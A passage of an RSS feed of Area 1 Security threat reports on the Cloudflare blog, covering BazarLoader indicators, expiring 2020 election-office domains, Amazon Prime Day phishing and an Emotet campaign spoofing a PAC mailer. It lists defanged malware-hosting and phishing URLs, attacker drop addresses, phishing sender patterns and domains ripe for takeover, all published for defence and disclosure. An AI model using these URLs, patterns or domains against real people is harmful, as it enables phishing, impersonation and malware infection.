Messages:</b></p><p>hxxps://files.constantcontact.com/0d2efd83801/50f95d03-8af1-4396-ac84-d6a7f1212026.pdf</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vQzFpGbLRNSIpbklM51_9P78DJbhxmMLeMzQUJxX9roupKMn3xYX1ZBEjP2Jo5_CHbzoqIdVnwPeazU/pub</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRhLU8Ar86crHTwsP7rSyStmTABnsPtQ4q3Mic9UIZN-hz06cO8fuzsiiEus9seLQHDU4T51YGcejNU/pub</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vTVCHKzmdSD2wX03GTnyBToo4xvldfGqtFWZiz5bT5cTRozW4Xk5H6GER0GmscSPqnpyFtokphDl-_U/pub</p><p>hxxps://files[.]constantcontact[.]com/5e536f60101/8c5d270a-897a-4ac8-845a-86c920bf229c[.]pdf</p><p>hxxps://files[.]constantcontact[.]com/defde16c001/0aa90d3a-932f-4343-8661-22e4f6488705[.]pdf</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vSlUktRROV3hU60c_n8LWFpOQBdyJj-N10g4tn14hBfmdaiRGKL9rc4vnTRYdLErwU0AHt7WwbzwU9q/pub</p><p>hxxps://docs[.]google[.]com/document/d/e/2PACX-1vRFLfuWRihaQHjGEPs8-Dm7Y3VxEFRpiUJuJmD9Vm6y3xVSSG9Vc3XxRnbyHQzIoWQ_5REbdDbkOq0s/pub</p><p><b>Outbound BazarLoader DNS Requests (Port 53):</b></p><p>95[.]174[.]65[.]241:53</p><p>195[.]16[.]195[.]195:53</p><p>192[.]71[.]245[.]208:53</p><p>176[.]126[.]70[.]119:53</p><p>151[.]80[.]222[.]79:53</p><p>94[.]16[.]114[.]254:53</p><p>193[.]183[.]98[.]66:53</p><p>51[.]254[.]25[.]115:53</p><p><b>Blockchain Domains:</b></p><p>bdfgimbfhgio[.]bazar</p><p>dcehjldeghjn[.]bazar</p><p>bdfgjlbfhgjn[.]bazar</p><p>adehklafghkn[.]bazar</p><p>ceggilcgigin[.]bazar</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Microsoft]]></category>
            <guid isPermaLink="false">3MLuYtiPmUFKjdEY8WquAQ</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[With 14 days to go, we haven’t nailed the basics: election security risks from expired domains]]></title>
            <link>https://blog.cloudflare.com/2020-election-security-risks-from-expired-domains/</link>
            <pubDate>Tue, 20 Oct 2020 09:45:00 GMT</pubDate>
            <description><![CDATA[ Failure for any organization to properly register their domains poses several key risks. For example, anyone who might register an election-sensitive domain would be able to assume the identity of elections officials and send phishing emails. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>In less than two weeks on 3 November 2020, the United States of America will hold its quadrennial Presidential election. Concerns over cybersecurity protections and processes implemented over the preceding four years remain high, as reports of foreign interference, infrastructure vulnerabilities, and failed preparedness continue to abound.</p><p>Area 1 Security outlined the risks posed by threat actors to election administrators and their email security controls in a <a href="https://www.cloudflare.com/static/45be4c3d55f238fdfaa0f8dc301f129f/BDES-3794_CloudflareArea1_Report_PhishingBurismaHoldings_REVSEPT2022.pdf">recent report</a>; and we continue to analyze the baseline security practices as the nation prepares for the elections.</p><p>Just this week on Monday, 19 October 2020, the website for Orange County, Florida’s Supervisor of Elections was <a href="https://www.orlandosentinel.com/politics/2020-election/os-ne-2020-florida-early-voting-kicks-off-20201019-4ptenafivjhanpkgz5x6sbag64-story.html">down</a>. Florida’s fifth-most populous county failed to properly re-register their domain, something that was luckily resolved without incident. Four more election sensitive domains are set to expire before Election Day on 3 November 2020:</p><p>albanywi.org 2020-10-22T15:48:51Z</p><p>bcn.net 2020-10-27T04:00:00Z</p><p>chesternh.org 2020-11-01T21:06:59.000Z</p><p>bethlehemnh.org 2020-11-02T14:07:25Z</p><p>And another 20 are set to expire before the year’s end, which could be critical if outcomes are not determined or remain in question before inauguration day on 20 January 2021.</p><p>arwhlaw.com 2020-11-10T05:00:00Z</p><p>cityofcumberland.net 2020-11-13T16:46:49Z</p><p>burnetcountytexas.org 2020-11-14T00:01:15Z</p><p>antwerptownship.com 2020-11-14T22:28:21Z</p><p>bessemermi.org 2020-11-15T23:58:58Z</p><p>carsoncitymi.com 2020-11-16T16:13:58Z</p><p>carrollcountyga.com 2020-11-17T18:13:46Z</p><p>buttscounty.org 2020-11-21T18:40:57.00Z</p><p>bridgeportmi.org 2020-11-21T19:20:24Z</p><p>ci.superior.wi.us 2020-11-27T23:59:59Z</p><p>bentcounty.net 2020-12-04T15:43:00Z</p><p>cityofbr.org 2020-12-06T17:31:36Z</p><p>birchruntwp.com 2020-12-16T11:25:06Z</p><p>ci.emporia.va.us 2020-12-18T23:59:59Z</p><p>hardeecountyelections.com 2020-12-20T11:59:59Z</p><p>barrecity.org 2020-12-23T17:34:03Z</p><p>alphacomm.net 2020-12-24T05:00:00Z</p><p>andersoncountyks.org 2020-12-26T16:10:34.000Z</p><p>broomecounty.us 2020-12-27T23:59:59Z</p><p>hcnj.us 2020-12-29T23:59:59Z</p><p>An extensive list of election sensitive domain registrations is provided <a href="https://github.com/area1/exim-cve-2019-10149-data/blob/master/election-domains-by-expiration-date.txt">here</a>.</p><p>Failure for any organization to properly register their domains poses several key risks:</p><ol><li><p>Anyone who might register an election-sensitive domain would be able to assume the identity of elections officials and send phishing emails.</p></li><li><p>Critical voter information could be removed from the internet or changed.</p></li></ol>
    <div>
      <h3>Recommendations:</h3>
      <a href="#recommendations">
        
      </a>
    </div>
    <ul><li><p><b>Vote!</b></p></li><li><p>Domain owners should check the expiration dates of their domains and immediately make sure they are secured for the maximum ownership time available</p></li><li><p>Observe the recommendations for securing email in the prior “<a href="https://www.cloudflare.com/static/45be4c3d55f238fdfaa0f8dc301f129f/BDES-3794_CloudflareArea1_Report_PhishingBurismaHoldings_REVSEPT2022.pdf">Phishing Election Administrators</a>” report outlining the risks to election administrators and officials.</p></li></ul> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">NwYtNygHsw5VB68vyBFyr</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Spike in Amazon phishing for Prime Day: a new day of deals means new phishing campaigns]]></title>
            <link>https://blog.cloudflare.com/2020-amazon-prime-day-phishing/</link>
            <pubDate>Tue, 13 Oct 2020 14:33:00 GMT</pubDate>
            <description><![CDATA[ Cyber criminals target Amazon Prime members. 2020 Prime Day phishing attacks attempt to steal credit card details, PII data. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Mark your calendars, October 13-14 is Amazon’s Prime Day! A whole 24 hours of exclusive deals just for Prime members. For most of us who haven’t been impulsively buying during the quarantine after spending all day sitting on our laptops, this means it might be time to open up Amazon and check out the latest deals.</p><p><b>However, cyber criminals have also prepared for what may likely be the biggest Prime Day ever. Each year, they</b> ramp up their Amazon phishing schemes, to steal login credentials and credit card details with convincing lures regarding Prime membership.</p><p>Amazon is a highly spoofed company. Criminals commonly use Amazon to steal sensitive information as a means to bolster their ill-gotten coffers. Targets can be easily tricked by these phishing messages as attackers continually update to more and more timely and convincing lures.Coronavirus-related lockdowns, combined with Prime Day sales, gives cyber criminals the ideal scenario for criminal activity. Instead of perusing shopping aisles with limited capacity and reduced hours, customers <a href="https://www.wsj.com/articles/amazons-sales-jump-as-coronavirus-prompts-surge-in-online-shopping-11588278740">rely more than ever</a> on Amazon for daily necessities and now, of course, the highly-anticipated Prime Day deals.</p><p>What else makes Prime Day risky in 2020? Many big box retailers cancelling their Black Friday sales in light of the pandemic. This makes Prime Day an even bigger focus for cyber criminals.</p><p>This year, attackers are using several advanced tactics to create more convincing messages.</p>
    <div>
      <h3>Your Amazon Account’s On Hold - Update Payment Info</h3>
      <a href="#your-amazon-accounts-on-hold-update-payment-info">
        
      </a>
    </div>
    <p>Amazon shoppers should understand the latest methods employed by cyber criminals, in order to avoid falling victim to these types of scams.</p><p>Here is the most prevalent phishing lure uncovered by Area 1 Security researchers: An Amazon-branded email states that there is a problem with the credit card linked to the user’s Amazon account, and the customer’s account is “on hold” until the customer can provide updated card information.</p><p>This scam, of course, is just an attempt to steal an Amazon Prime member’s credit card data.</p><p>We’ve found a number of disparate campaigns leveraging similar lures but with varying levels of sophistication.</p><p>The more stealthy phishing messages reveal convincing brand-specific content, carefully constructed to imitate a real Amazon email.</p><p>As shown in Figure 1, the content, logo and graphics are in line with what you might encounter in an actual Amazon notification email. The attacker behind this campaign used several advanced tactics to create a convincing message, including:</p><ul><li><p>Meticulous HTML/CSS coding</p></li><li><p>Embedding images from Amazon in the source code</p></li><li><p>Hosting malicious content on a legitimate website</p></li><li><p>Leveraging Newly Registered Domains (NRDs) to send the phishing messages</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3sjy28uZRUFekenfGijzfP/683be120f4c4250d675090bdbaa867eb/image9-1.png" />
            
            </figure><p>This particular campaign used numerous domains to send their phishing messages, all of which were newly registered. The sender email accounts containing these domains followed either one of two patterns:</p><ul><li><p>no-reply-amazon-notify&lt;<i>11 alphanumeric characters</i>&gt;@&lt;<i>newly registered domain</i>&gt;</p></li><li><p>mail-services-amazon-prime-&lt;<i>11 alphanumeric characters</i>&gt;@&lt;<i>newly registered domain</i>&gt;</p></li></ul><p>The phishing messages sent from these accounts contained malicious links that revealed the attacker either leveraged NRDs, or abused the legitimate services of <a href="https://snip.ly/whatis#:~:text=Sniply%20is%20a%20simple%20tool,with%20every%20link%20you%20share.">Sniply</a> to host their Amazon look-alike sites.</p><p>What is Sniply? It allows users to create custom links with a free user account. As a result, Sniply is an attractive option for attackers looking to find unsuspecting sites to host their nefarious content.</p><p>The text “Update Payment Information” in the body of the message is a hyperlink to a presumably spoofed Amazon login page. Area 1 Security observed yet another pattern, this time with the Sniply links:</p><ul><li><p>hxxps://snip[.]ly/xjey66?.amazon-prime-services=</p></li><li><p>hxxps://snip[.]ly/o1u9cb?amazon.data.prime=</p></li><li><p>hxxps://snip[.]ly/9axm0u?ad-amazon.isuue-id=</p></li></ul><p>The identification of these patterns in both the sender addresses and malicious links is highly suggestive of a phishing kit.</p><p>At the time of our analysis, the pages for these links were no longer accessible. Fortunately, Sniply was quick to the draw and blocked access to the attacker’s malicious content. However, with attackers easily creating Newly Registered Domains, it won’t take long to create a new malicious website and begin another wave of phishing messages.</p><p>These ever-evolving Amazon-themed campaigns are an ongoing threat to many individuals and businesses alike. The use of NRDs, as well as abuse of legitimate services, make these phish particularly difficult to detect.</p><p>To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this.</p><p>Although we recognized and stopped this campaign from reaching users’ inboxes before any damage could be done, there are still similar and ongoing campaigns with active links that are hitting the inboxes of targets without adequate email security.</p><p>As malicious actors create new campaigns with increasingly sophisticated tactics, users need to be aware of the latest techniques to stay safe from these opportunistic attacks.</p>
    <div>
      <h3>Your Amazon Prime Membership Has Expired</h3>
      <a href="#your-amazon-prime-membership-has-expired">
        
      </a>
    </div>
    <p>Another Amazon-themed phishing campaign, launched in the days leading up to Prime Day, attempts to convince shoppers that their Prime membership has expired.</p><p>This campaign entices the customer to click a link to update card information on file in order to continue enjoying their Prime benefits. In the figure below, you can see that the message is simple, to the point, and — again — contains Amazon branding.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Phnok9aqhiGebxUEhYcQL/d9ef6267f84a8a2cfb9a7cdfc91a6bd9/image10.png" />
            
            </figure><p>In the example above, the fraudsters used Display Name Spoofing to make the email appear as if it originated from “Amazon Prime”.</p><p>However, Area 1 Security’s closer inspection of the email headers reveals that the message has an “envelope-from” address of ad4@dianefloresbrown[.]com and was sent by way of wineu[.]mail.</p><p>At the time of analysis, these domains did not resolve to any IP addresses. Further, all IPs appearing in the header were private (or for internal network use only), having no significance outside the local network, and thus providing some degree of anonymity for the attacker.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5IPKxqsP8G4ifFkzyqqOHh/fabdbdd7a82684c677e6a16d3cd12d8a/image2-6.png" />
            
            </figure><p>This particular campaign has been linked to malicious Amazon-related spoofs dating back to 2016, and is still being updated on an almost daily basis.</p><p>A number of the phishing websites used by this cyber criminal happen to share a unique URL pattern, allowing for easier tracking of the fraudulent activity.</p><p>For example, clicking on the hyperlink for the text “Update your payment method” will result in the victim’s browser loading the malicious content located at, hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F92a1dd58f9544ab8efd1c744612385a9/?dispatch=KNE0iodoOoqK5tDxLF7q0bbIsyFnO28x2xuq3Qvu5sVyxSL3EE. In an effort to avoid detection and being indexed by various web crawlers, every time the link is clicked, a new URL is generated. Parameters within the URL that vary are detailed below:</p><ul><li><p>hxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F&lt;<i>hashed and base64-encoded GMT/UTC timestamp</i>&gt;/?dispatch=&lt;<i>randomly generated alphanumeric characters</i>&gt;</p></li></ul><p>After clicking the malicious link, the victim is directed through a series of steps to verify their identity and input payment information. Before being redirected to the real Amazon site, the victim is presented with a screen that displays their account has been successfully updated, and they will be logged out.</p><p>The figure below exposes the victim’s journey across multiple Amazon-branded sites:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xzK7lC0rpLGZG4tqVhQyl/695671708d4321712fad77f90c4907ad/Screenshot-2022-11-02-at-11.32.51.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/51HolmsXKZeQwsybQSBHMb/6de13a485cf1e5a3f93ea5b6789ad03a/Screenshot-2022-11-02-at-11.33.15.png" />
            
            </figure><p>Figure 4. Sequence of Phishing Attack</p><p>As evidenced above, the attacker is attempting to steal not only credit card, but also personally identifying information (PII).</p><p>This sensitive data is then sent to the attacker at the addresses btsmpil@gmail[.]com and kabiyesi@zoho[.]com. There are no cookies stored once the target is redirected to the Amazon homepage, indicating that the attack does not attempt to get additional information from the Amazon session.</p><p>In a misstep by the attacker, the index of their malicious website was made public (as shown in Figure 5), allowing anyone to view the technical details behind their operation.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/21BjrDPgCpOPlvHnMVTIta/240abf4290dbd3e4f3e37209fe26e862/image3-4.png" />
            
            </figure><p>Figure 5. Index of Malicious Website</p><p>This oversight allowed researchers at Area 1 Security to access the source code for the website and delve into the numerous scripts used to carry out the attack.</p><p>Several unique artifacts were discovered that can be used to possibly identify any additional or future campaigns carried out by this attacker. For instance, a number of div classes follow a very similar format:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Ax2v1h6HqElAXR5Lt7ZqS/e066b9265a9027c2854cef7b4f4c384a/image4-5.png" />
            
            </figure><p>Figure 6. HTML of Malicious Website</p><p>As revealed in the figure above, each of the div classes uses “tajouri” as a prefix for containers, as well as the name of “containtindex”. No information was found as to why this was used as a naming convention, however it might give researchers another possible avenue for associating this cyber criminal with future attacks or phishing kits.</p><p>The main index page for the malicious site contains the code responsible for safeguarding its contents from web crawlers and for generating unique URLs for each visitor. As highlighted below, a screen name was identified on this page, “AYB SCH”, among a trove of profanity-laced code. Whether this attacker wanted the code to be discovered in order to gain internet notoriety is up for debate.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GlFwufBS7yFudbVVle7Pq/8bb074bca012391a46faa0d32f7d543b/carbon.png" />
            
            </figure><p>An additional artifact was found that offers yet another interesting, if not unique, identifier used by this cyber criminal. The below code comes from the “Account Verification” step of the attack. The specific div class format can be seen once again, as well as what appears to be French text in the HTML’s  tags, which is slang for “shut up”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Uw2IhZyIrkapu2GsXyXXw/e8747e7689c2a8d146a0f34bb3ffd5f2/carbon--1-.png" />
            
            </figure><p>This source code provides a little insight into the cyber criminals behind these Amazon-themed attacks.</p><p>Many of the phishing campaigns appear to originate from overseas, as seen in the ISPs used, and were orchestrated by individuals who are well-versed in programming, if not English expletives. These fraudsters clearly see this as a game, where they hope to outsmart defenses while taunting those that may be hot on their trail.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>With cyber criminals well-equipped for the upcoming rush to Prime Day deals, it is vital that companies prepare adequate defenses to protect users from falling victim to these Amazon-themed attacks.</p><p>As malicious actors invent new ways to bypass defenses, including the use of newly registered domains and legitimate online services, security practitioners need to turn to solutions on the cutting edge of <a href="https://www.cloudflare.com/zero-trust/products/email-security/">email security technology</a> in order to block these highly-damaging, financially-driven phishing campaigns.</p><p>New tactics and methods may be able to trick legacy vendors and cloud email providers, but Area 1 Security’s anti-phishing solution stops these fraudsters dead in their tracks.</p><p>Our advanced Machine Learning and Artificial Intelligence technology allows our algorithms to uncover new tactics malicious actors are using to bypass defenses in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">stop phishing attempt</a>s at delivery time. This has many advantages over post-delivery retraction in that users are never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Sender Domains:</b></p><p>Kimakxbisakok[.]com</p><p>kauadalahmantanterinda[.]com</p><p>Ikannilakayarasa[.]com</p><p>Bilangbabiamadia[.]com</p><p>com-accountingproved.com</p><p>ad4@dianefloresbrown[.]com</p><p>wineu[.]mail</p><p><b>Sender IP Addresses:</b></p><p>36[.]71[.]143[.]138</p><p>36[.]68[.]138[.]85</p><p><b>Sender Email Addresses:</b></p><p>no-reply-amazon-notify5jsciki79he@kimakxbisakok[.]com</p><p>no-reply-amazon-notify1os6uge0kzh@kimakxbisakok[.]com</p><p>no-reply-amazon-notifyhrbdqdoupsz@kauadalahmantanterinda[.]com</p><p>no-reply-amazon-notifym55jh93ft92@kauadalahmantanterinda[.]com</p><p>no-reply-amazon-notifykf9ul2d33jx@ikannilakayarasa[.]com</p><p>no-reply-amazon-notifymn5dzrjbwwc@bilangbabiamadia[.]com</p><p>mail-services-amazon-prime-pswrpeavczy@com-accountingproved[.]com</p><p>mail-services-amazon-prime-2av302jgvrp@com-accountingproved[.]com</p><p>mail-services-amazon-prime-5yww41luv8a@com-accountingproved[.]com</p><p>mail-services-amazon-prime-i7a98af4a29@com-accountingproved[.]com</p><p>mail-services-amazon-prime-xroq3gqfnm3@com-accountingproved[.]com</p><p><b>Attacker Email Addresses:</b></p><p>btsmpil@gmail[.]com</p><p>kabiyesi@zoho[.]com</p><p><b>Malicious Links:</b></p><p>hxxps://snip[.]ly/xjey66?.amazon-prime-services=</p><p>hxxps://snip[.]ly/o1u9cb?amazon.data.prime=</p><p>hxxps://snip[.]ly/9axm0u?ad-amazon.isuue-id=</p><p>hxxps://interistingkostins[.]com/MwM7tEjhxxps://asxtbibcx[.]com/amazon/ama/ACCESS744558886441BNG5F7558DERS85699SVB/F&lt;<i>hashed and base64 encoded GMT/UTC timestamp</i>&gt;/?dispatch=&lt;<i>randomly generated alphanumeric characters</i>&gt;</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">7vDwIcMpft2wnTlIQ8J2H6</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[PAC spoof drops Emotet: phishing campaign leverages stolen PAC content to drop Emotet]]></title>
            <link>https://blog.cloudflare.com/pac-spoof-drops-emotet-phish/</link>
            <pubDate>Tue, 06 Oct 2020 10:48:00 GMT</pubDate>
            <description><![CDATA[ President Donald Trump, election fundraising, Microsoft Office 365 used to send Emotet malware in fake Political Action Committee phishing email. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Following the recent <a href="https://healthitsecurity.com/news/emotet-malware-actors-return-with-malicious-email-campaign">return of Emotet</a> after a five-month hiatus, a newly-discovered phishing campaign is using updated tactics by leveraging the hype surrounding President Trump’s decision to halt U.S. funding for the World Health Organization (WHO). In a ruse to drop this dangerous banking trojan, the malicious messages take the form of a typical Political Action Committee (PAC) email, eliciting support for presidential incumbent Donald Trump in the upcoming 2020 election.</p><p>First caught by Area 1 Security on August 21st, this ongoing campaign contains all the hallmarks of the resurgence of Emotet:</p><ul><li><p>Leveraging stolen email content</p></li><li><p>Subject lines prefaced with “Fwd:” and ”RE:”</p></li><li><p>And PowerShell commands to download and execute the malware</p></li></ul><p>This campaign, however, aims to compromise politically-related entities rather than just the typical targets of opportunity that are commonly associated with this banking trojan. In Figure 1, you can see how the attacker forwards a legitimate PAC mailer to develop a false sense of legitimacy, with entirely authentic content throughout the body of the message. Every link works and leads to benign web pages of the impersonated PAC.</p><p>Like a Wolf in sheep’s clothing, the attacker cleverly disguises their Emotet delivery mechanism as messaging about timely and highly publicized, hot-button issues in politics.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ytkluOmXOD1hJxnypVEaC/76b71fe462ae6f17fbfce5323a29dae2/image4-6.png" />
            
            </figure><p>Figure 1. Screenshot of phishing message</p><p>The subject of the email reads <b>“Fwd:Breaking: President. Trump suspends funding to WHO,”</b> and the attacker employs Display Name Spoofing in an attempt to mask the true sender address. The <i>actual</i> sender addresses used to spread the phishing messages vary, but all have one thing in common: <b>each is a legitimate account compromised by the attacker to launch this fraudulent WHO-themed campaign.</b></p><p>A closer look at the attacker’s infrastructure reveals compromised hosts used in the transfer of the phishing messages, such as the sending Mail Transfer Agent (MTA) server[.]websoftperu[.]com. Area 1 Security suspects that this MTA may have been compromised due to an open port running a very outdated version of OpenSSH (7.4), which has numerous <a href="https://nvd.nist.gov/vuln/search/results?form_type=Advanced&amp;cves=on&amp;cpe_version=cpe:/a:openbsd:openssh:7.4">vulnerabilities</a>.</p><p>Similarly:</p><ul><li><p>Compromised email accounts of several small businesses around the world were used in each wave of this campaign, again luring victims with the same stolen PAC email content.</p></li><li><p>One of these accounts is also connected to similar phishing messages with slightly different lures, all with the intent to infect targets with Emotet.</p></li><li><p>The example account above is, in particular, the source of various politically-themed phishing messages that contain stolen content from a number of different PAC mailers and was observed in the targeting of politically-affiliated email accounts.</p></li></ul><p>The attacker primarily uses compromised accounts to successfully pass email authentication protocols, such as DMARC, DKIM, and SPF.</p><p>Whereas other malicious actors may look for sender domains that do not have these protocols configured or configured correctly, <b>this attacker boldly leverages correctly-configured authentication protocols to their advantage.</b> This tactic allows the attacker to bypass legacy vendors that solely rely on these authentication methods to provide indicators of maliciousness.</p><p>There is approximately one week of turnover time between each wave of the campaign as the attacker retools to get ahead of defenses. This includes various changes, such as modifying the weaponized attachment and using new compromised sender infrastructure and accounts.</p><p>Efforts like this can easily equip the attacker with the ability to circumvent typical signature-based detections that depend on IP addresses and payload hashes of known threats, leading defenders through a never-ending game of “cat and mouse”.</p>
    <div>
      <h3>Analysis of Malware</h3>
      <a href="#analysis-of-malware">
        
      </a>
    </div>
    <p>At the bottom of the phishing message, there is a Microsoft Word Document that uses VBA Macros to drop the first-stage payload, the Emotet downloader. After clicking on the document, the user is prompted by a dialog box to enable editing and content, as depicted below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2G3ir7Qw3akI7P1XaEpSak/9d311857679dfa72e2ab3aadaefc517a/image2-8.png" />
            
            </figure><p>Figure 2. Screenshot of Dialog Box</p><p>Merely clicking this box will enable a highly obfuscated VBA Macro (as shown in Figure 3) that runs an equally obfuscated PowerShell command using Windows Management Instrumentation (WMI).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5wLVTbEWxGWjgj7BoJaify/622248d7b9aedde014f413897272913b/image1-7.png" />
            
            </figure><p>Figure 3. Screenshot of Macro VBA obfuscated code</p><p>The content in Figure 4 shows a sampling of the PowerShell script after Area 1 Security researchers deobfuscated a majority of the code. This script attempts to download Emotet from a list of hardcoded <i>compromised WordPress</i> sites. It first runs through this list of sites (as highlighted below) to determine which are still actively hosting the Emotet trojan.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hEqjf9OW4FW593ADrmF9J/b20e4cb7dd78c55bc4701be7d6c3c072/image3-5.png" />
            
            </figure><p>Figure 4. Screenshot of deobfuscated PowerShell</p><p>Area 1 Security found that, among the compromised sites hardcoded in the malware, only the link hxxp://cammis[.]com[.]br/wp-admin/8IArx/ was still active at the time of analysis. Once the final payload is found on a functioning site, it is downloaded to a temporary folder on the victim’s device, located at %userprofiles%\AppData\Local\. From here, a message is sent back to the Emotet command and control (C2) server, confirming that it was successfully downloaded.</p>
    <div>
      <h3>What Makes Emotet Difficult to Detect?</h3>
      <a href="#what-makes-emotet-difficult-to-detect">
        
      </a>
    </div>
    <p><a href="https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/">Emotet</a> is among some of the most destructive and costly malware, affecting both the public and private sectors. Once this advanced, modular banking trojan compromises a target device, other hosts on the network are at risk of infection, as the malware’s worm-like capabilities allow it to easily self-replicate to other connected devices. Sensitive information on the compromised hosts can be considered free rein, where essentially no data is safe from the attacker.</p><p>Since Emotet is primarily delivered via attachments or links in phishing emails, the attacker takes extra measures to ensure their messages <b>will not trigger legacy email security solutions</b>. These tactics range from simply changing the name and hash of the malicious file, to more advanced anti-debugging and host-environment analysis capabilities.</p><p>Emotet’s modular Dynamic Link Libraries (DLLs) and polymorphic nature offer the attacker not only continuously evolving capabilities but also effortless evasion of signature-based detection systems. Analysis of this evasive trojan can present challenges for those attempting to reverse the malware, as it is virtual-environment aware and will infinitely sleep in an attempt to render debugging analysis techniques ineffective. With malicious actors using constantly evolving malware, new and advanced techniques are needed to detect and catch these phishing messages before they reach users’ inboxes.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology leverage algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p><b>Compromised Sender Email Addresses:</b></p><p>accounts@alhilaldecors[.]com</p><p>reservas@carentminibus[.]com</p><p>sargodha@deluxefootwear[.]com[.]pk</p><p>c25@hahncollections[.]co[.]za</p><p><b>Sender IP Addresses:</b></p><p>59[.]127[.]189[.]26</p><p>103[.]133[.]214[.]57</p><p>175[.]138[.]0[.]109</p><p>208[.]109[.]80[.]1</p><p><b>Sender Domains:</b></p><p>Server1[.]gigafield[.]com</p><p>Server[.]websoftperu[.]com</p><p><b>Compromised Emotet Websites:</b></p><p>hxxp://cammis[.]com[.]br/wp-admin/8lArx/</p><p>hxxps://indiafricatoday[.]com/wp-admin/l0WmSB/</p><p>hxxp://gosmartmoving[.]com/wp-content/3QC/</p><p>hxxp://ilfacomercial[.]cl/wp-includes/P/</p><p>hxxp://hanh[.]cz/blogs/XU/</p><p>hxxps://myvanillastuffs[.]xyz/wp-admin/hjL8d/</p><p>hxxp://condi-shop[.]ru/wp-includes/nWJ/</p><p><b>Attachment Hashes:</b></p><p>MD5: 031be6a39da92ccedefc3ef3e5cc12aa</p><p>SHA1: 1eed6a05b977b6b13a8df2cafed8f1cdf7d53088</p><p>SHA256: 5d4bee6f5bb0d02b980f21c2ae731bd12d5de2e2810058e6098fc888a7cc6f7b</p><p>SSdeep: 1536:A2Fj72Fjmrdi1Ir77zOH98Wj2gpngh+a9BlJizP:1rfrzOH98ipgnYzP</p><p>MD5: 729d528ab5073b012c6dcded3872bb62</p><p>SHA1: 1984ee2ffcfc14beec272f671833bf506ab85f72</p><p>SHA256: d647fbb82b18f11ade1b505a7f9a065441fe8a187377299900bae27fe4047740</p><p>SSdeep: 3072:5Yy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////n:T0uXnWFchmmcI/o1/q1Bw4</p><p>MD5: 86b7f3f18a2e57ae66ba824b0c43be01</p><p>SHA1: ea1302e16d433653adf3071325bc8c2288b2a85e</p><p>SHA256: 874b498a569260ed044256f13bd87d1a3697f02a17a364d2d61ba9005e12cd25</p><p>SSdeep: 3072:fYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////k:B0uXnWFchmmcI/o1/N2ODQwKdk</p><p>MD5: 7dc4f1c537c0557a3e38106803b43449</p><p>SHA1: 